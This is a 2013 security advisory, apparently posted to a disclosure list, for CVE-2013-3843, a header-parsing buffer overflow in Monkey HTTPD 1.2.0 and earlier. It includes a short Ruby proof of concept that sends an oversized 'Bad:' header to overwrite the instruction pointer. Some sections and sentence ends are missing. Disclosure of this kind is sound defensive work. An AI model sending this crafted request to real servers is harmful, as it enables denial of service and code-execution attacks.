Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
Date: Tue Jun 04 2013 - 11:19:49 CDT
CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS
Vulnerability With Possible Arbitrary Code Execution
Monkey is a lightweight and powerful web server for
It has been designed to be very scalable with low memory
and CPU consumption, the perfect solution for embedded
devices. Made for ARM, x86 and x64.
A specially crafted request sent to the Monkey HTTPD
server triggers a buffer overflow which can be used to
control the flow of execution.
4. Report Timeline
Discovered vulnerability via fuzzing
6. Affected Products
Monkey HTTPD <= 1.2.0
7. Exploitation Technique
Improper bounds checking while parsing headers allows
for an attacker to craft a request that will trigger a
buffer overflow during a call to memcpy() on line 268
in the file, mk_request.c.
9. Proof of Concept
The vulnerability can be exploited by remote attacker
without any special privileges. Under Ubuntu 13.04,
an offset of 2511 lines up the instruction pointer
host = "localhost"
port = 2001
s = TCPSocket.open(host, port)
buf = "GET / HTTP/1.1\r\n"
buf << "Host: " + "\r\n"
buf << "localhost\r\n"
buf << "Bad: "
buf << "A" * 2511
buf << "B" * 4
There is currently no solution.
Risk should be considered high since it can be shown that
the flow of execution can be controlled by an attacker.
Doug Prostko <dougtko[at]gmail[dot]com>